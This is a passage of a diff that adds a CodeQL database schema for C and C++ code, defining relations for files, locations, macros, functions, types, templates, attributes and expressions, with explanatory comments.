+ * `elapsed_seconds` are the CPU time and elapsed time (respectively)
+ * that extraction took for compiler invocation `id`.
+ */
+compilation_finished(
+ unique int id : @compilation ref,
+ float cpu_seconds : float ref,
+ float elapsed_seconds : float ref
+);
+
+/*- External data -*/
+
+/**
+ * External data, loaded from CSV files during snapshot creation. See
+ * [Tutorial: Incorporating external data](https://help.semmle.com/wiki/display/SD/Tutorial%3A+Incorporating+external+data)
+ * for more information.
+ */
+externalData(
+ int id : @externalDataElement,
+ string path : string ref,
+ int column: int ref,
+ string value : string ref
+);
+
+/*- Source location prefix -*/
+
+/**
+ * The source location of the snapshot.
+ */
+sourceLocationPrefix(string prefix : string ref);
+
+/*- Files and folders -*/
+
+/**
+ * The location of an element.
+ * The location spans column `startcolumn` of line `startline` to
+ * column `endcolumn` of line `endline` in file `file`.
+ * For more information, see
+ * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/).
+ */
+locations_default(
+ unique int id: @location_default,
+ int file: @file ref,
+ int beginLine: int ref,
+ int beginColumn: int ref,
+ int endLine: int ref,
+ int endColumn: int ref
+);
+
+files(
+ unique int id: @file,
+ string name: string ref
+);
+
+folders(
+ unique int id: @folder,
+ string name: string ref
+);
+
+@container = @file | @folder
+
+containerparent(
+ int parent: @container ref,
+ unique int child: @container ref
+);
+
+/*- Lines of code -*/
+
+numlines(
+ int element_id: @sourceline ref,
+ int num_lines: int ref,
+ int num_code: int ref,
+ int num_comment: int ref
+);
+
+/*- Diagnostic messages -*/
+
+diagnostics(
+ unique int id: @diagnostic,
+ int severity: int ref,
+ string error_tag: string ref,
+ string error_message: string ref,
+ string full_error_message: string ref,
+ int location: @location_default ref
+);
+
+/*- C++ dbscheme -*/
+
+extractor_version(
+ string codeql_version: string ref,
+ string frontend_version: string ref
+)
+
+/**
+ * Gives the TRAP
filename that `trap` is associated with. + * For debugging only. + */ +trap_filename( + int trap: @trap, + string filename: string ref +); + +/** + * Gives the tag name for `tag`. + * For debugging only. + */ +tag_name( + int tag: @tag, + string name: string ref +); + +@trap_or_tag = @tag | @trap; + +/** + * Gives the name for the source file. + */ +source_file_name( + int sf: @source_file, + string name: string ref +); + +/** + * In `build-mode: none` overlay mode, indicates that `source_file` + * (`/path/to/foo.c`) uses the TRAP file `trap_file`; i.e. it is the + * TRAP file corresponding to `foo.c`, something it transitively + * includes, or a template instantiation it transitively uses. + */ +source_file_uses_trap( + int source_file: @source_file ref, + int trap_file: @trap ref +); + +/** + * In `build-mode: none` overlay mode, indicates that the TRAP file + * `trap_file` uses tag `tag`. + */ +trap_uses_tag( + int trap_file: @trap ref, + int tag: @tag ref +); + +/** + * Holds if there is a definition of `element` in TRAP file or tag `t`. + */ +in_trap_or_tag( + int element: @element ref, + int t: @trap_or_tag ref +); + +pch_uses( + int pch: @pch ref, + int compilation: @compilation ref, + int id: @file ref +) + +#keyset[pch, compilation] +pch_creations( + int pch: @pch, + int compilation: @compilation ref, + int from: @file ref +) + +/** An element for which line-count information is available. 
*/ +@sourceline = @file | @function | @variable | @enumconstant | @xmllocatable; + +fileannotations( + int id: @file ref, + int kind: int ref, + string name: string ref, + string value: string ref +); + +inmacroexpansion( + int id: @element ref, + int inv: @macroinvocation ref +); + +affectedbymacroexpansion( + int id: @element ref, + int inv: @macroinvocation ref +); + +case @macroinvocation.kind of + 1 = @macro_expansion +| 2 = @other_macro_reference +; + +macroinvocations( + unique int id: @macroinvocation, + int macro_id: @ppd_define ref, + int location: @location_default ref, + int kind: int ref +); + +macroparent( + unique int id: @macroinvocation ref, + int parent_id: @macroinvocation ref +); + +// a macroinvocation may be part of another location +// the way to find a constant expression that uses a macro +// is thus to find a constant expression that has a location +// to which a macro invocation is bound +macrolocationbind( + int id: @macroinvocation ref, + int location: @location_default ref +); + +#keyset[invocation, argument_index] +macro_argument_unexpanded( + int invocation: @macroinvocation ref, + int argument_index: int ref, + string text: string ref +); + +#keyset[invocation, argument_index] +macro_argument_expanded( + int invocation: @macroinvocation ref, + int argument_index: int ref, + string text: string ref +); + +case @function.kind of + 0 = @unknown_function +| 1 = @normal_function +| 2 = @constructor +| 3 = @destructor +| 4 = @conversion_function +| 5 = @operator +// ... 6 = @builtin_function deprecated // GCC built-in functions, e.g. 
__builtin___memcpy_chk +| 7 = @user_defined_literal +| 8 = @deduction_guide +; + +functions( + unique int id: @function, + string name: string ref, + int kind: int ref +); + +builtin_functions( + int id: @function ref +) + +function_entry_point( + int id: @function ref, + unique int entry_point: @stmt ref +); + +function_return_type( + int id: @function ref, + int return_type: @type ref +); + +/** + * If `function` is a coroutine, then this gives the `std::experimental::resumable_traits` + * instance associated with it, and the variables representing the `handle` and `promise` + * for it. + */ +coroutine( + unique int function: @function ref, + int traits: @type ref +); + +/* +case @coroutine_placeholder_variable.kind of + 1 = @handle +| 2 = @promise +| 3 = @init_await_resume +; +*/ + +coroutine_placeholder_variable( + unique int placeholder_variable: @variable ref, + int kind: int ref, + int function: @function ref +) + +/** The `new` function used for allocating the coroutine state, if any. */ +coroutine_new( + unique int function: @function ref, + int new: @function ref +); + +/** The `delete` function used for deallocating the coroutine state, if any. 
*/ +coroutine_delete( + unique int function: @function ref, + int delete: @function ref +); + +purefunctions(unique int id: @function ref); + +function_deleted(unique int id: @function ref); + +function_defaulted(unique int id: @function ref); + +function_prototyped(unique int id: @function ref) + +deduction_guide_for_class( + int id: @function ref, + int class_template: @usertype ref +) + +member_function_this_type( + unique int id: @function ref, + int this_type: @type ref +); + +#keyset[id, type_id] +fun_decls( + int id: @fun_decl, + int function: @function ref, + int type_id: @type ref, + string name: string ref, + int location: @location_default ref +); +fun_def(unique int id: @fun_decl ref); +fun_specialized(unique int id: @fun_decl ref); +fun_implicit(unique int id: @fun_decl ref); +fun_decl_specifiers( + int id: @fun_decl ref, + string name: string ref +) +#keyset[fun_decl, index] +fun_decl_throws( + int fun_decl: @fun_decl ref, + int index: int ref, + int type_id: @type ref +); +/* an empty throw specification is different from none */ +fun_decl_empty_throws(unique int fun_decl: @fun_decl ref); +fun_decl_noexcept( + int fun_decl: @fun_decl ref, + int constant: @expr ref +); +fun_decl_empty_noexcept(int fun_decl: @fun_decl ref); +fun_decl_typedef_type( + unique int fun_decl: @fun_decl ref, + int typedeftype_id: @usertype ref +); + +/* +case @fun_requires.kind of + 1 = @template_attached +| 2 = @function_attached +; +*/ + +fun_requires( + int id: @fun_decl ref, + int kind: int ref, + int constraint: @expr ref +); + +param_decl_bind( + unique int id: @var_decl ref, + int index: int ref, + int fun_decl: @fun_decl ref +); + +#keyset[id, type_id] +var_decls( + int id: @var_decl, + int variable: @variable ref, + int type_id: @type ref, + string name: string ref, + int location: @location_default ref +); +var_def(unique int id: @var_decl ref); +var_specialized(int id: @var_decl ref); +var_decl_specifiers( + int id: @var_decl ref, + string name: string ref +) 
+is_structured_binding(unique int id: @variable ref); +var_requires( + int id: @var_decl ref, + int constraint: @expr ref +); + +type_decls( + unique int id: @type_decl, + int type_id: @type ref, + int location: @location_default ref +); +type_def(unique int id: @type_decl ref); +type_decl_top( + unique int type_decl: @type_decl ref +); +type_requires( + int id: @type_decl ref, + int constraint: @expr ref +); + +namespace_decls( + unique int id: @namespace_decl, + int namespace_id: @namespace ref, + int location: @location_default ref, + int bodylocation: @location_default ref +); + +case @using.kind of + 1 = @using_declaration +| 2 = @using_directive +| 3 = @using_enum_declaration +; + +usings( + unique int id: @using, + int element_id: @element ref, + int location: @location_default ref, + int kind: int ref +); + +/** The element which contains the `using` declaration. */ +using_container( + int parent: @element ref, + int child: @using ref +); + +static_asserts( + unique int id: @static_assert, + int condition : @expr ref, + string message : string ref, + int location: @location_default ref, + int enclosing : @element ref +); + +// each function has an ordered list of parameters +#keyset[id, type_id] +#keyset[function, index, type_id] +params( + int id: @parameter, + int function: @parameterized_element ref, + int index: int ref, + int type_id: @type ref +); + +overrides( + int new: @function ref, + int old: @function ref +); + +#keyset[id, type_id] +membervariables( + int id: @membervariable, + int type_id: @type ref, + string name: string ref +); + +#keyset[id, type_id] +globalvariables( + int id: @globalvariable, + int type_id: @type ref, + string name: string ref +); + +#keyset[id, type_id] +localvariables( + int id: @localvariable, + int type_id: @type ref, + string name: string ref +); + +autoderivation( + unique int var: @variable ref, + int derivation_type: @type ref +); + +orphaned_variables( + int var: @localvariable ref, + int function: @function ref 
+) + +enumconstants( + unique int id: @enumconstant, + int parent: @usertype ref, + int index: int ref, + int type_id: @type ref, + string name: string ref, + int location: @location_default ref +); + +@variable = @localscopevariable | @globalvariable | @membervariable; + +@localscopevariable = @localvariable | @parameter; + +/** + * Built-in types are the fundamental types, e.g., integral, floating, and void. + */ +case @builtintype.kind of + 1 = @errortype +| 2 = @unknowntype +| 3 = @void +| 4 = @boolean +| 5 = @char +| 6 = @unsigned_char +| 7 = @signed_char +| 8 = @short +| 9 = @unsigned_short +| 10 = @signed_short +| 11 = @int +| 12 = @unsigned_int +| 13 = @signed_int +| 14 = @long +| 15 = @unsigned_long +| 16 = @signed_long +| 17 = @long_long +| 18 = @unsigned_long_long +| 19 = @signed_long_long +// ... 20 Microsoft-specific __int8 +// ... 21 Microsoft-specific __int16 +// ... 22 Microsoft-specific __int32 +// ... 23 Microsoft-specific __int64 +| 24 = @float +| 25 = @double +| 26 = @long_double +| 27 = @complex_float // C99-specific _Complex float +| 28 = @complex_double // C99-specific _Complex double +| 29 = @complex_long_double // C99-specific _Complex long double +| 30 = @imaginary_float // C99-specific _Imaginary float +| 31 = @imaginary_double // C99-specific _Imaginary double +| 32 = @imaginary_long_double // C99-specific _Imaginary long double +| 33 = @wchar_t // Microsoft-specific +| 34 = @decltype_nullptr // C++11 +| 35 = @int128 // __int128 +| 36 = @unsigned_int128 // unsigned __int128 +| 37 = @signed_int128 // signed __int128 +| 38 = @float128 // __float128 +| 39 = @complex_float128 // _Complex __float128 +// ... 40 _Decimal32 +// ... 41 _Decimal64 +// ... 42 _Decimal128 +| 43 = @char16_t +| 44 = @char32_t +| 45 = @std_float32 // _Float32 +| 46 = @float32x // _Float32x +| 47 = @std_float64 // _Float64 +| 48 = @float64x // _Float64x +| 49 = @std_float128 // _Float128 +// ... 
50 _Float128x +| 51 = @char8_t +| 52 = @float16 // _Float16 +| 53 = @complex_float16 // _Complex _Float16 +| 54 = @fp16 // __fp16 +| 55 = @std_bfloat16 // __bf16 +| 56 = @std_float16 // std::float16_t +| 57 = @complex_std_float32 // _Complex _Float32 +| 58 = @complex_float32x // _Complex _Float32x +| 59 = @complex_std_float64 // _Complex _Float64 +| 60 = @complex_float64x // _Complex _Float64x +| 61 = @complex_std_float128 // _Complex _Float128 +| 62 = @mfp8 // __mfp8 +| 63 = @scalable_vector_count // __SVCount_t +| 64 = @complex_fp16 // _Complex __fp16 +| 65 = @complex_std_bfloat16 // _Complex __bf16 +| 66 = @complex_std_float16 // _Complex std::float16_t +; + +builtintypes( + unique int id: @builtintype, + string name: string ref, + int kind: int ref, + int size: int ref, + int sign: int ref, + int alignment: int ref +); + +/** + * Derived types are types that are directly derived from existing types and + * point to, refer to, transform type data to return a new type. + */ +case @derivedtype.kind of + 1 = @pointer +| 2 = @reference +| 3 = @type_with_specifiers +| 4 = @array +| 5 = @gnu_vector +| 6 = @routineptr +| 7 = @routinereference +| 8 = @rvalue_reference // C++11 +// ... 9 type_conforming_to_protocols deprecated +| 10 = @block +| 11 = @scalable_vector // Arm SVE +; + +derivedtypes( + unique int id: @derivedtype, + string name: string ref, + int kind: int ref, + int type_id: @type ref +); + +pointerishsize(unique int id: @derivedtype ref, + int size: int ref, + int alignment: int ref); + +arraysizes( + unique int id: @derivedtype ref, + int num_elements: int ref, + int bytesize: int ref, + int alignment: int ref +); + +tupleelements( + unique int id: @derivedtype ref, + int num_elements: int ref +); + +typedefbase( + unique int id: @usertype ref, + int type_id: @type ref +); + +/** + * An instance of the C++11 `decltype` operator or C23 `typeof`/`typeof_unqual` + * operator taking an expression as its argument. 
For example: + * ``` + * int a; + * decltype(1+a) b; + * typeof(1+a) c; + * ``` + * Here `expr` is `1+a`. + * + * Sometimes an additional pair of parentheses around the expression + * changes the semantics of the decltype, e.g. + * ``` + * struct A { double x; }; + * const A* a = new A(); + * decltype( a->x ); // type is double + * decltype((a->x)); // type is const double& + * ``` + * (Please consult the C++11 standard for more details). + * `parentheses_would_change_meaning` is `true` iff that is the case. + */ + +/* +case @decltype.kind of +| 0 = @decltype +| 1 = @typeof // The frontend does not differentiate between typeof and typeof_unqual +; +*/ + +#keyset[id, expr] +decltypes( + int id: @decltype, + int expr: @expr ref, + int kind: int ref, + int base_type: @type ref, + boolean parentheses_would_change_meaning: boolean ref +); + +case @type_operator.kind of + 0 = @typeof // The frontend does not differentiate between typeof and typeof_unqual +| 1 = @underlying_type +| 2 = @bases +| 3 = @direct_bases +| 4 = @add_lvalue_reference +| 5 = @add_pointer +| 6 = @add_rvalue_reference +| 7 = @decay +| 8 = @make_signed +| 9 = @make_unsigned +| 10 = @remove_all_extents +| 11 = @remove_const +| 12 = @remove_cv +| 13 = @remove_cvref +| 14 = @remove_extent +| 15 = @remove_pointer +| 16 = @remove_reference_t +| 17 = @remove_restrict +| 18 = @remove_volatile +| 19 = @remove_reference +; + +type_operators( + unique int id: @type_operator, + int arg_type: @type ref, + int kind: int ref, + int base_type: @type ref +) + +case @usertype.kind of + 0 = @unknown_usertype +| 1 = @struct +| 2 = @class +| 3 = @union +| 4 = @enum +// ... 5 = @typedef deprecated // classic C: typedef typedef type name +// ... 6 = @template deprecated +| 7 = @template_parameter +| 8 = @template_template_parameter +| 9 = @proxy_class // a proxy class associated with a template parameter +// ... 10 objc_class deprecated +// ... 11 objc_protocol deprecated +// ... 
12 objc_category deprecated +| 13 = @scoped_enum +// ... 14 = @using_alias deprecated // a using name = type style typedef +| 15 = @template_struct +| 16 = @template_class +| 17 = @template_union +| 18 = @alias +; + +usertypes( + unique int id: @usertype, + string name: string ref, + int kind: int ref +); + +usertypesize( + unique int id: @usertype ref, + int size: int ref, + int alignment: int ref +); + +usertype_final(unique int id: @usertype ref); + +usertype_uuid( + unique int id: @usertype ref, + string uuid: string ref +); + +/* +case @usertype.alias_kind of +| 0 = @typedef +| 1 = @alias +*/ + +usertype_alias_kind( + int id: @usertype ref, + int alias_kind: int ref +) + +nontype_template_parameters( + int id: @expr ref +); + +type_template_type_constraint( + int id: @usertype ref, + int constraint: @expr ref +); + +mangled_name( + unique int id: @declaration ref, + int mangled_name : @mangledname, + boolean is_complete: boolean ref +); + +is_pod_class(unique int id: @usertype ref); +is_standard_layout_class(unique int id: @usertype ref); + +is_complete(unique int id: @usertype ref); + +is_class_template(unique int id: @usertype ref); +class_instantiation( + int to: @usertype ref, + int from: @usertype ref +); +class_template_argument( + int type_id: @usertype ref, + int index: int ref, + int arg_type: @type ref +); +class_template_argument_value( + int type_id: @usertype ref, + int index: int ref, + int arg_value: @expr ref +); +class_template_generated_from( + unique int template: @usertype ref, + int from: @usertype ref +) + +@user_or_decltype = @usertype | @decltype; + +is_proxy_class_for( + unique int id: @usertype ref, + int templ_param_id: @user_or_decltype ref +); + +type_mentions( + unique int id: @type_mention, + int type_id: @type ref, + int location: @location_default ref, + // a_symbol_reference_kind from the frontend. 
+ int kind: int ref +); + +is_function_template(unique int id: @function ref); +function_instantiation( + unique int to: @function ref, + int from: @function ref +); +function_template_argument( + int function_id: @function ref, + int index: int ref, + int arg_type: @type ref +); +function_template_argument_value( + int function_id: @function ref, + int index: int ref, + int arg_value: @expr ref +); +function_template_generated_from( + unique int template: @function ref, + int from: @function ref +); + +is_variable_template(unique int id: @variable ref); +variable_instantiation( + unique int to: @variable ref, + int from: @variable ref +); +variable_template_argument( + int variable_id: @variable ref, + int index: int ref, + int arg_type: @type ref +); +variable_template_argument_value( + int variable_id: @variable ref, + int index: int ref, + int arg_value: @expr ref +); +variable_template_generated_from( + unique int template: @variable ref, + int from: @variable ref +); + +is_alias_template(unique int id: @usertype ref); +alias_instantiation( + unique int to: @usertype ref, + int from: @usertype ref +); +alias_template_argument( + int type_id: @usertype ref, + int index: int ref, + int arg_type: @type ref +); +alias_template_argument_value( + int type_id: @usertype ref, + int index: int ref, + int arg_value: @expr ref +); +alias_template_generated_from( + unique int template: @usertype ref, + int from: @usertype ref +); + +template_template_instantiation( + int to: @usertype ref, + int from: @usertype ref +); +template_template_argument( + int type_id: @usertype ref, + int index: int ref, + int arg_type: @type ref +); +template_template_argument_value( + int type_id: @usertype ref, + int index: int ref, + int arg_value: @expr ref +); + +@concept = @concept_template | @concept_id; + +concept_templates( + unique int concept_id: @concept_template, + string name: string ref, + int location: @location_default ref +); +concept_instantiation( + unique int to: 
@concept_id ref, + int from: @concept_template ref +); +is_type_constraint(int concept_id: @concept_id ref); +concept_template_argument( + int concept_id: @concept ref, + int index: int ref, + int arg_type: @type ref +); +concept_template_argument_value( + int concept_id: @concept ref, + int index: int ref, + int arg_value: @expr ref +); + +routinetypes( + unique int id: @routinetype, + int return_type: @type ref +); + +routinetypeargs( + int routine: @routinetype ref, + int index: int ref, + int type_id: @type ref +); + +ptrtomembers( + unique int id: @ptrtomember, + int type_id: @type ref, + int class_id: @type ref +); + +/* + specifiers for types, functions, and variables + + "public", + "protected", + "private", + + "const", + "volatile", + "static", + + "pure", + "virtual", + "sealed", // Microsoft + "__interface", // Microsoft + "inline", + "explicit", + + "near", // near far extension + "far", // near far extension + "__ptr32", // Microsoft + "__ptr64", // Microsoft + "__sptr", // Microsoft + "__uptr", // Microsoft + "dllimport", // Microsoft + "dllexport", // Microsoft + "thread", // Microsoft + "naked", // Microsoft + "microsoft_inline", // Microsoft + "forceinline", // Microsoft + "selectany", // Microsoft + "nothrow", // Microsoft + "novtable", // Microsoft + "noreturn", // Microsoft + "noinline", // Microsoft + "noalias", // Microsoft + "restrict", // Microsoft +*/ + +specifiers( + unique int id: @specifier, + unique string str: string ref +); + +typespecifiers( + int type_id: @type ref, + int spec_id: @specifier ref +); + +funspecifiers( + int func_id: @function ref, + int spec_id: @specifier ref +); + +varspecifiers( + int var_id: @accessible ref, + int spec_id: @specifier ref +); + +explicit_specifier_exprs( + unique int func_id: @function ref, + int constant: @expr ref +) + +attributes( + unique int id: @attribute, + int kind: int ref, + string name: string ref, + string name_space: string ref, + int location: @location_default ref +); + +case 
@attribute.kind of + 0 = @gnuattribute +| 1 = @stdattribute +| 2 = @declspec +| 3 = @msattribute +| 4 = @alignas +// ... 5 @objc_propertyattribute deprecated +; + +attribute_args( + unique int id: @attribute_arg, + int kind: int ref, + int attribute: @attribute ref, + int index: int ref, + int location: @location_default ref +); + +case @attribute_arg.kind of + 0 = @attribute_arg_empty +| 1 = @attribute_arg_token +| 2 = @attribute_arg_constant +| 3 = @attribute_arg_type +| 4 = @attribute_arg_constant_expr +| 5 = @attribute_arg_expr +; + +attribute_arg_value( + unique int arg: @attribute_arg ref, + string value: string ref +); +attribute_arg_type( + unique int arg: @attribute_arg ref, + int type_id: @type ref +); +attribute_arg_constant( + unique int arg: @attribute_arg ref, + int constant: @expr ref +) +attribute_arg_expr( + unique int arg: @attribute_arg ref, + int expr: @expr ref +) +attribute_arg_name( + unique int arg: @attribute_arg ref, + string name: string ref +); + +typeattributes( + int type_id: @type ref, + int spec_id: @attribute ref +); + +funcattributes( + int func_id: @function ref, + int spec_id: @attribute ref +); + +varattributes( + int var_id: @accessible ref, + int spec_id: @attribute ref +); + +namespaceattributes( + int namespace_id: @namespace ref, + int spec_id: @attribute ref +); + +stmtattributes( + int stmt_id: @stmt ref, + int spec_id: @attribute ref +); + +@type = @builtintype + | @derivedtype + | @usertype + | @routinetype + | @ptrtomember + | @decltype + | @type_operator; + +unspecifiedtype( + unique int type_id: @type ref, + int unspecified_type_id: @type ref +); + +member( + int parent: @type ref, + int index: int ref, + int child: @member ref +); + +@enclosingfunction_child = @usertype | @variable | @namespace + +enclosingfunction( + unique int child: @enclosingfunction_child ref, + int parent: @function ref +); + +derivations( + unique int derivation: @derivation, + int sub: @type ref, + int index: int ref, + int super: @type ref, 
+ int location: @location_default ref +); + +derspecifiers( + int der_id: @derivation ref, + int spec_id: @specifier ref +); + +/** + * Contains the byte offset of the base class subobject within the derived + * class. Only holds for non-virtual base classes, but see table + * `virtual_base_offsets` for offsets of virtual base class subobjects. + */ +direct_base_offsets( + unique int der_id: @derivation ref, + int offset: int ref +); + +/** + * Contains the byte offset of the virtual base class subobject for class + * `super` within a most-derived object of class `sub`. `super` can be either a + * direct or indirect base class. + */ +#keyset[sub, super] +virtual_base_offsets( + int sub: @usertype ref, + int super: @usertype ref, + int offset: int ref +); + +frienddecls( + unique int id: @frienddecl, + int type_id: @type ref, + int decl_id: @declaration ref, + int location: @location_default ref +); + +@declaredtype = @usertype ; + +@declaration = @function + | @declaredtype + | @variable + | @enumconstant + | @frienddecl + | @concept_template; + +@member = @membervariable + | @function + | @declaredtype + | @enumconstant; + +@locatable = @diagnostic + | @declaration + | @ppd_include + | @ppd_define + | @macroinvocation + /*| @funcall*/ + | @xmllocatable + | @attribute + | @attribute_arg; + +@namedscope = @namespace | @usertype; + +@element = @locatable + | @file + | @folder + | @specifier + | @type + | @expr + | @namespace + | @initialiser + | @stmt + | @derivation + | @comment + | @preprocdirect + | @fun_decl + | @var_decl + | @type_decl + | @namespace_decl + | @using + | @namequalifier + | @specialnamequalifyingelement + | @static_assert + | @type_mention + | @lambdacapture; + +@exprparent = @element; + +comments( + unique int id: @comment, + string contents: string ref, + int location: @location_default ref +); + +commentbinding( + int id: @comment ref, + int element: @element ref +); + +exprconv( + int converted: @expr ref, + unique int conversion: @expr ref 
+); + +compgenerated(unique int id: @element ref); + +/** + * `destructor_call` destructs the `i`'th entity that should be + * destructed following `element`. Note that entities should be + * destructed in reverse construction order, so for a given `element` + * these should be called from highest to lowest `i`. + */ +#keyset[element, destructor_call] +#keyset[element, i] +synthetic_destructor_call( + int element: @element ref, + int i: int ref, + int destructor_call: @routineexpr ref +); + +namespaces( + unique int id: @namespace, + string name: string ref +); + +namespace_inline( + unique int id: @namespace ref +); + +namespacembrs( + int parentid: @namespace ref, + unique int memberid: @namespacembr ref +); + +@namespacembr = @declaration | @namespace; + +exprparents( + int expr_id: @expr ref, + int child_index: int ref, + int parent_id: @exprparent ref +); + +expr_isload(unique int expr_id: @expr ref); + +@cast = @c_style_cast + | @const_cast + | @dynamic_cast + | @reinterpret_cast + | @static_cast + ; + +/* +case @conversion.kind of + 0 = @simple_conversion // a numeric conversion, qualification conversion, or a reinterpret_cast +| 1 = @bool_conversion // conversion to 'bool' +| 2 = @base_class_conversion // a derived-to-base conversion +| 3 = @derived_class_conversion // a base-to-derived conversion +| 4 = @pm_base_class_conversion // a derived-to-base conversion of a pointer to member +| 5 = @pm_derived_class_conversion // a base-to-derived conversion of a pointer to member +| 6 = @glvalue_adjust // an adjustment of the type of a glvalue +| 7 = @prvalue_adjust // an adjustment of the type of a prvalue +; +*/ +/** + * Describes the semantics represented by a cast expression. This is largely + * independent of the source syntax of the cast, so it is separate from the + * regular expression kind. 
+ */ +conversionkinds( + unique int expr_id: @cast ref, + int kind: int ref +); + +@conversion = @cast + | @array_to_pointer + | @parexpr + | @reference_to + | @ref_indirect + | @temp_init + | @c11_generic + ; + +/* +case @funbindexpr.kind of + 0 = @normal_call // a normal call +| 1 = @virtual_call // a virtual call +| 2 = @adl_call // a call whose target is only found by ADL +; +*/ +iscall( + unique int caller: @funbindexpr ref, + int kind: int ref +); + +numtemplatearguments( + unique int expr_id: @expr ref, + int num: int ref +); + +specialnamequalifyingelements( + unique int id: @specialnamequalifyingelement, + unique string name: string ref +); + +@namequalifiableelement = @expr | @namequalifier; +@namequalifyingelement = @namespace + | @specialnamequalifyingelement + | @usertype + | @decltype; + +namequalifiers( + unique int id: @namequalifier, + unique int qualifiableelement: @namequalifiableelement ref, + int qualifyingelement: @namequalifyingelement ref, + int location: @location_default ref +); + +varbind( + int expr: @varbindexpr ref, + int var: @accessible ref +); + +funbind( + int expr: @funbindexpr ref, + int fun: @function ref +); + +@any_new_expr = @new_expr + | @new_array_expr; + +@new_or_delete_expr = @any_new_expr + | @delete_expr + | @delete_array_expr; + +@prefix_crement_expr = @preincrexpr | @predecrexpr; + +@postfix_crement_expr = @postincrexpr | @postdecrexpr; + +@increment_expr = @preincrexpr | @postincrexpr; + +@decrement_expr = @predecrexpr | @postdecrexpr; + +@crement_expr = @increment_expr | @decrement_expr; + +@un_arith_op_expr = @arithnegexpr + | @unaryplusexpr + | @conjugation + | @realpartexpr + | @imagpartexpr + | @crement_expr + ; + +@un_bitwise_op_expr = @complementexpr; + +@un_log_op_expr = @notexpr; + +@un_op_expr = @address_of + | @indirect + | @un_arith_op_expr + | @un_bitwise_op_expr + | @builtinaddressof + | @vec_fill + | @un_log_op_expr + | @co_await + | @co_yield + ; + +@bin_log_op_expr = @andlogicalexpr | @orlogicalexpr; 
+ +@cmp_op_expr = @eq_op_expr | @rel_op_expr; + +@eq_op_expr = @eqexpr | @neexpr; + +@rel_op_expr = @gtexpr + | @ltexpr + | @geexpr + | @leexpr + | @spaceshipexpr + ; + +@bin_bitwise_op_expr = @lshiftexpr + | @rshiftexpr + | @andexpr + | @orexpr + | @xorexpr + ; + +@p_arith_op_expr = @paddexpr + | @psubexpr + | @pdiffexpr + ; + +@bin_arith_op_expr = @addexpr + | @subexpr + | @mulexpr + | @divexpr + | @remexpr + | @jmulexpr + | @jdivexpr + | @fjaddexpr + | @jfaddexpr + | @fjsubexpr + | @jfsubexpr + | @minexpr + | @maxexpr + | @p_arith_op_expr + ; + +@bin_op_expr = @bin_arith_op_expr + | @bin_bitwise_op_expr + | @cmp_op_expr + | @bin_log_op_expr + ; + +@op_expr = @un_op_expr + | @bin_op_expr + | @assign_expr + | @conditionalexpr + ; + +@assign_arith_expr = @assignaddexpr + | @assignsubexpr + | @assignmulexpr + | @assigndivexpr + | @assignremexpr + ; + +@assign_bitwise_expr = @assignandexpr + | @assignorexpr + | @assignxorexpr + | @assignlshiftexpr + | @assignrshiftexpr + ; + +@assign_pointer_expr = @assignpaddexpr + | @assignpsubexpr + ; + +@assign_op_expr = @assign_arith_expr + | @assign_bitwise_expr + | @assign_pointer_expr + ; + +@assign_expr = @assignexpr | @assign_op_expr | @blockassignexpr + +/* + Binary encoding of the allocator form. + + case @allocator.form of + 0 = plain + | 1 = alignment + ; +*/ + +/** + * The allocator function associated with a `new` or `new[]` expression. + * The `form` column specified whether the allocation call contains an alignment + * argument. + */ +expr_allocator( + unique int expr: @any_new_expr ref, + int func: @function ref, + int form: int ref +); + +/* + Binary encoding of the deallocator form. + + case @deallocator.form of + 0 = plain + | 1 = size + | 2 = alignment + | 4 = destroying_delete + ; +*/ + +/** + * The deallocator function associated with a `delete`, `delete[]`, `new`, or + * `new[]` expression. 
For a `new` or `new[]` expression, the deallocator is the + * one used to free memory if the initialization throws an exception. + * The `form` column specifies whether the deallocation call contains a size + * argument, and alignment argument, or both. + */ +expr_deallocator( + unique int expr: @new_or_delete_expr ref, + int func: @function ref, + int form: int ref +); + +/** + * Holds if the `@conditionalexpr` is of the two operand form + * `guard ? : false`. + */ +expr_cond_two_operand( + unique int cond: @conditionalexpr ref +); + +/** + * The guard of `@conditionalexpr` `guard ? true : false` + */ +expr_cond_guard( + unique int cond: @conditionalexpr ref, + int guard: @expr ref +); + +/** + * The expression used when the guard of `@conditionalexpr` + * `guard ? true : false` holds. For the two operand form + * `guard ?: false` consider using `expr_cond_guard` instead. + */ +expr_cond_true( + unique int cond: @conditionalexpr ref, + int true: @expr ref +); + +/** + * The expression used when the guard of `@conditionalexpr` + * `guard ? true : false` does not hold. + */ +expr_cond_false( + unique int cond: @conditionalexpr ref, + int false: @expr ref +); + +/** A string representation of the value. */ +values( + unique int id: @value, + string str: string ref +); + +/** The actual text in the source code for the value, if any. 
*/ +valuetext( + unique int id: @value ref, + string text: string ref +); + +valuebind( + int val: @value ref, + unique int expr: @expr ref +); + +fieldoffsets( + unique int id: @variable ref, + int byteoffset: int ref, + int bitoffset: int ref +); + +bitfield( + unique int id: @variable ref, + int bits: int ref, + int declared_bits: int ref +); + +/* TODO +memberprefix( + int member: @expr ref, + int prefix: @expr ref +); +*/ + +/* + kind(1) = mbrcallexpr + kind(2) = mbrptrcallexpr + kind(3) = mbrptrmbrcallexpr + kind(4) = ptrmbrptrmbrcallexpr + kind(5) = mbrreadexpr // x.y + kind(6) = mbrptrreadexpr // p->y + kind(7) = mbrptrmbrreadexpr // x.*pm + kind(8) = mbrptrmbrptrreadexpr // x->*pm + kind(9) = staticmbrreadexpr // static x.y + kind(10) = staticmbrptrreadexpr // static p->y +*/ +/* TODO +memberaccess( + int member: @expr ref, + int kind: int ref +); +*/ + +initialisers( + unique int init: @initialiser, + int var: @accessible ref, + unique int expr: @expr ref, + int location: @location_default ref +); + +braced_initialisers( + int init: @initialiser ref +); + +/** + * An ancestor for the expression, for cases in which we cannot + * otherwise find the expression's parent. + */ +expr_ancestor( + int exp: @expr ref, + int ancestor: @element ref +); + +exprs( + unique int id: @expr, + int kind: int ref, + int location: @location_default ref +); + +expr_reuse( + int reuse: @expr ref, + int original: @expr ref, + int value_category: int ref +) + +/* + case @value.category of + 1 = prval + | 2 = xval + | 3 = lval + ; +*/ +expr_types( + int id: @expr ref, + int typeid: @type ref, + int value_category: int ref +); + +case @expr.kind of + 1 = @errorexpr +| 2 = @address_of // & AddressOfExpr +| 3 = @reference_to // ReferenceToExpr (implicit?) +| 4 = @indirect // * PointerDereferenceExpr +| 5 = @ref_indirect // ReferenceDereferenceExpr (implicit?) +// ... +| 8 = @array_to_pointer // (???) +| 9 = @vacuous_destructor_call // VacuousDestructorCall +// ... 
